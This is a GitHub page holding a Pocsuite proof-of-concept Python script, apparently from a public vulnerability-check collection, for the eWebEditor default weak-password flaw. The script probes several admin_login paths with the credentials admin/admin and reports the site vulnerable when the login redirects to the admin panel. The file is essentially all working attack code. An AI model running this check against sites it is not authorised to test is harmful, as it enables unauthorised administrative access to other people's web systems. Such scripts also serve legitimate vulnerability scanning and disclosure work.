-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy path_130423_eWebEditor_all_weak_password.py
executable file
·52 lines (45 loc) · 1.66 KB
/
_130423_eWebEditor_all_weak_password.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '62352' # ssvid
version = '1.0'
author = ['']
vulDate = '2013-04-23'
createDate = '2016-03-07'
updateDate = '2016-03-07'
references = ['http://www.seebug.org/vuldb/ssvid-62352']
name = 'eWebEditor 弱密码漏洞'
appPowerLink = 'http://www.ewebeditor.net/'
appName = 'eWebEditor'
appVersion = 'ALL'
vulType = 'Weak Password'
desc = '''
ewebeditor默认情况下, 可用弱口令登录,从而导致攻击者可据此信息进行后续攻击。
'''
samples = ['']
def _attack(self):
return self._verify()
def _verify(self):
result = {}
paths = ["/admin_login.asp", "/admin/ewebeditor/admin_login.asp",
"/edit/admin_login.asp",
"/ewebeditor/admin_login.asp", "/admin/login.php"]
for path in paths:
target = "%s%s?action=login&usr=admin&pwd=admin" % (self.url, path)
res = req.get(target)
if "admin_default.asp" in res.url and "href='admin_login.asp'" in res.content and "eWebEditor" in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
return self.parse_output(result)
def parse_output(self, result):
# parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)